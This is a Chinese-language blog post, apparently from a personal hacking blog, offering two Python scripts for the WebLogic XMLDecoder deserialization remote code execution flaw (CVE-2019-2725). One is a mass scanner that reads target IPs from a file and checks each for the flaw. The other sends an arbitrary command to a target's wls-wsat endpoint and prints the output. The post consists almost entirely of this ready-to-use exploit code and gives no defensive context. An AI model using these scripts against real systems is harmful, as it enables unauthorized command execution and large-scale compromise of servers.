Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

  • A+
所属分类:颓废's Blog
摘要

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

主要来还是懒  废话不多说直接上exp和poc 吧  poc并不通用 更多用exp吧 

IP填入ip.txt 后用poc检测

POC

import requests import sys import time import random import threading def exec_cmd(ip,cmd):  url="http://"+ip+"/wls-wsat/CoordinatorPortType11"  headers={  'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',  'CMD' : cmd,  'SOAPAction':'""',  'Content-Type':'text/xml'  }  with open('payload.txt','rb') as f :   payloads=f.read()  r=requests.post(url,headers=headers,data=payloads,timeout=5)  return r.content.decode() def test_poc(ip):  check=str(int(time.time())+int(random.uniform(1000,9999)))  out=exec_cmd(ip,'echo '+check)  if check in out:   print('vul finds:'+ip) def main():   print("put ips in ip.txt ")  with open('ip.txt') as f:   for line in f.readlines():    try:     test_poc(line)    except :     pass  print("End")   if __name__ == '__main__':  main()。

exp

import requests import sys def exec_cmd(ip,cmd):  url="http://"+ip+"/wls-wsat/CoordinatorPortType11"  headers={  'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',  'CMD' : cmd,  'SOAPAction':'""',  'Content-Type':'text/xml'  }  with open('payload.txt','rb') as f :   payloads=f.read()  r=requests.post(url,headers=headers,data=payloads)  return r.content.decode() def main():  if len(sys.argv)<3:   print('usage:exp.py www.0dayhack.com:8080 whoami')   sys.exit()  ip=sys.argv[1]  cmd=sys.argv[2]  out=exec_cmd(ip,cmd)  print(out) if __name__ == '__main__':  main()

Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

注意:

只支持Py3

ip.txt是放检测的

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: